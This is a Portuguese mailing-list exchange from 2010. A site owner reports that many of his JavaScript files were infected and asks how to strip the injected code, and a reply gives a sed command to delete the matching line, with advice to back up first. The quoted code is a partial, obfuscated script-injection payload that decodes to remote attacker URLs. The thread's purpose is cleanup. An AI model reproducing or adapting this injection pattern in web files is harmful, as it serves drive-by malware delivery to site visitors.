-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
On 04/13/2010 09:50 PM, Fernando Avena wrote:
> pessoal acontece de varios .js ter sido contaminados e dentro deles foi
> colocado um conteudo malicioso.
>
>
> var l="";try {this.u='';var j;if(j!=''){j='S'};var Ir=new Array();var
> g;if(g!='dF'){g=''};var x;if(x!='R' && x!='si'){x='R'};var z=RegExp;var
> xk;if(xk!='gL'){xk='gL'};var
> h="repS8v".substr(0,3)+"lactT6".substr(0,3)+"e";var
Jl="";this.O="";function
> s(q,Y){var yw=new Date();var m="Ke0[".substr(3);var Xx=new Date();var
> c;if(c!='' && c!='ZH'){c=null};var
> p=String("gI1Th".substr(0,1));m+=Y;m+=String("6Jb]".substr(3));var
> _b='';this.jP='';var XM="";var o=new z(m, p);return q[h](o, new
> String());this.r='';};this.uw="";this.oz='';var
>
hu=s('hMtMtMpM:M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoDmM.DcDoMnDdDuDiDtM-McMoMmM.MBDeMsMtDBMlDeDnMdDeDrDPMaDrDtM.MrMuM:M',"MD");var
> i=s('833404383440334',"34");var
>
V=s('/wpwi3x3n3e3t3.3n3e3t3/wpwiwxwn3ewt3.3n3ewtw/3g3o3o3gwl3ew.wcwowm3/3s3ows3ow.wc......
>
> *find js/ -name *.js | xargs grep -E
> "M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoD"*
>
> com linha acima...ele me mostra todos os arquivos e o conteudo da linha
> dentro deles.
>
> teria algo que possa coloca na frete e já faça a remoção desta var
l=.....
> de todos os .js que ele encontrou que tem o conteudo *
> kDeMtD-McMoDmM.DaMdMvDeD* na linha?
sed -e
'#M/M/DpDhDoDtDoDbMuMcMkDeMtD-McMoDmM.DaMdMvDeDrDtDsMeDrDvMeD.McDoD#d'
arquivo.js
Isso irá remover a linha que contém esse código obfuscado. Entretanto,
não irá modificar o arquivo original.
As versões mais atuais do sed tem a opção -i, que altera o arquivo
imediatamente, mas eu faria antes um backup do arquivo original.
O sed também dá essa opção a você. Estude-o, também para entender
porquê eu utilizei # como delimitador do sed ao invés do usual /
- --
Um abraço
.0. MrBiTs - address@hidden <mailto:mrbits.dcf%40gmail.com>
..0 GnuPG -
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x6EC818FC2B3CA5AB
<http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x6EC818FC2B3CA5AB>
000 http://www.mrbits.com.br <http://www.mrbits.com.br>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iQEcBAEBCAAGBQJLxayEAAoJEG7IGPwrPKWrecMH/1aYmFnuoBhUor5IGc8x3uWf
q80y+bMO8hqLe1Rx6vug5rMPqZ2o4bwhIAL58eAspaUFGuWj68tXrQnv20etZMU+
SlCLn8PGD3o+5lDu3ConSB5H9QrWqd+Z//7QbfjHcgHiYGGGwEZS56o9QdKozQ5M
8w7+HRy8cHtfKNhiOaKBnurYjY5W036pUYesYQ3yaT6D1HgWOlpE0D0DeH7MHnOy
vDDXgKUiCYnT7TjrIwzg1KjSo9Rl3VV4gJl39a81RZ7j3XUf/BYcKHGQD13z+j+N
Fwvgm0h1/xC5qs7ib+VP0N+w9YJwpOzJHXi169sfGVO1Ag9QdHUcAaz8y+BQ1OM=
=tu90
-----END PGP SIGNATURE-----